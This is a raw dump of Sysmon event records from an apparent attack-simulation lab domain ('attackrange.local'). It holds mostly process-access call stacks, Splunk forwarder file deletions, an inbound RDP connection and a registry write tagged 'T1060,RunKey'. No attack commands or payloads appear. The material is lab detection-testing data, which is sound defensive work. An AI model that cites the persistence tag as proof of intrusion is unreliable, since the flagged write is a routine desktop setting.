09:21:47.931{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.915{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.915{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7a5e|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.915{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7a5e|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.915{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7a5e|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.915{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f23cc|C:\Windows\System32\TwinUI.dll+b2d24|C:\Windows\System32\TwinUI.dll+aea6b|C:\Windows\System32\TwinUI.dll+cecda|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.915{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.915{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.915{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.915{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.899{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001055693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:21:47.884{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXEHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Control Panel\Desktop\TranscodedImageCountDWORD (0x00000001) 10341000x80000000000000001055692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.509{5EBD8912-8CC0-6151-1600-00000000FD01}12963424C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.509{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.509{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.509{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.493{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.477{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f997|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1279f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16992|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.477{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+1470c|C:\Windows\SYSTEM32\psmserviceexthost.dll+f933|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1279f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16992|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001055685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.477{5EBD8912-8D29-6151-8D00-00000000FD01}41364504C:\Windows\system32\sihost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.477{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.477{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+37172|c:\windows\system32\rpcss.dll+47a1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.399{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.399{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.384{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5743065895AEFC7677A7FB6E2EFBD918,SHA256=BD5B540065A6B1DD93F9AB10B45911AD5BC16D49336F47D9D3DA2159D41086D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980879Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:43.980{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61427-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001055679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.352{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E5B6F0DCDAC3F1139C228572A0C0877,SHA256=2BAE6855BEC33791CC62AF455E1F1F7EEB8310D5C7FFD210C71552DE32A82456,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.290{5EBD8912-8D2A-6151-9600-00000000FD01}4632ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Notifications\WPNPRMRY.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 